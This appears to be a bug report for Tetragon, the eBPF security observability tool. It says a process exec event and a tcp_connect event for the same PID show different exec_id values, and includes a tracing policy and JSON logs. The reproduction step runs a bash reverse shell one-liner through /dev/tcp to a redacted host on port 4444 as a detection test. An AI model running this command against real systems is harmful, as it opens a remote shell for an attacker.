exec_id inconsistent between process exec event and tcp_connect event #4349
Description
What happened? How can we reproduce this?
- In this environment
Rocky 9.4 - With this config and policy
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: "tcp"
spec:
kprobes:
- call: "tcp_connect"
syscall: false
args:
- index: 0
type: "sock"- Run
/bin/bash -i >& /dev/tcp/xx.xx.xx.23/4444 0>&1(for reverseshell test) - See error
Tetragon then generates multiple events. I’m focusing on process exec events and tcp_connect events.
The issue is:
Both events have the same PID 3628487, as expected.
But they have different exec_id values.
bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTc0MTcyMjUwOTMyNDMyOjM2Mjg0ODc=
bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTc0MTcyMjUyMjYyMjYzOjM2Mjg0ODc=
In theory, these events should share the same exec_id, because they come from the same process execution.
This inconsistency makes it difficult to correlate process and network events.
Could you please check whether this is expected behavior or a bug in the current exec_id generation logic?
Tetragon Version
CLI version: v1.6.0-pre.0-100-gb5b98e71c
Kernel Version
Linux localhost.localdomain 5.14.0-427.13.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 1 19:11:28 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
Kubernetes Version
No response
Bugtool
No response
Relevant log output
{
"process_kprobe": {
"process": {
"exec_id": "bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTc0MTcyMjUwOTMyNDMyOjM2Mjg0ODc=",
"pid": 3628487,
"uid": 0,
"cwd": "/root",
"binary": "/bin/bash",
"flags": "execve",
"start_time": "2025-11-14T10:20:58.503970417Z",
"auid": 0,
"parent_exec_id": "bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTQ0Mjc3MjE5NTMyNTM4OjM2MTg2ODk=",
"refcnt": 1,
"tid": 3628487,
"in_init_tree": false
},
"parent": {
"exec_id": "bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTQ0Mjc3MjE5NTMyNTM4OjM2MTg2ODk=",
"pid": 3618689,
"uid": 0,
"cwd": "/root",
"binary": "/bin/bash",
"flags": "execve clone",
"start_time": "2025-11-14T02:02:43.472569938Z",
"auid": 0,
"parent_exec_id": "bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTQ0Mjc3MTcyNDE4MzIyOjM2MTg2ODg=",
"tid": 3618689,
"in_init_tree": false
},
"function_name": "tcp_connect",
"args": [
{
"sock_arg": {
"family": "AF_INET",
"type": "SOCK_STREAM",
"protocol": "IPPROTO_TCP",
"saddr": "xx.xx.xx.14",
"daddr": "xx.xx.xx.23",
"sport": 41036,
"dport": 4444,
"cookie": "18446630761781911936",
"state": "TCP_SYN_SENT"
}
}
],
"action": "KPROBE_ACTION_POST",
"policy_name": "tcp",
"return_action": "KPROBE_ACTION_POST"
},
"node_name": "localhost.localdomain",
"time": "2025-11-14T10:20:58.504313965Z"
}
{
"process_exec": {
"process": {
"exec_id": "bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTc0MTcyMjUyMjYyMjYzOjM2Mjg0ODc=",
"pid": 3628487,
"uid": 0,
"cwd": "/root",
"binary": "/bin/bash",
"arguments": "-i",
"flags": "execve clone",
"start_time": "2025-11-14T10:20:58.505300242Z",
"auid": 0,
"parent_exec_id": "bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTQ0Mjc3MjE5NTMyNTM4OjM2MTg2ODk=",
"tid": 3628487,
"in_init_tree": false
},
"parent": {
"exec_id": "bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTQ0Mjc3MjE5NTMyNTM4OjM2MTg2ODk=",
"pid": 3618689,
"uid": 0,
"cwd": "/root",
"binary": "/bin/bash",
"flags": "execve clone",
"start_time": "2025-11-14T02:02:43.472569938Z",
"auid": 0,
"parent_exec_id": "bG9jYWxob3N0LmxvY2FsZG9tYWluOjI3NTQ0Mjc3MTcyNDE4MzIyOjM2MTg2ODg=",
"tid": 3618689,
"in_init_tree": false
}
},
"node_name": "localhost.localdomain",
"time": "2025-11-14T10:20:58.505299623Z"
}Anything else?
No response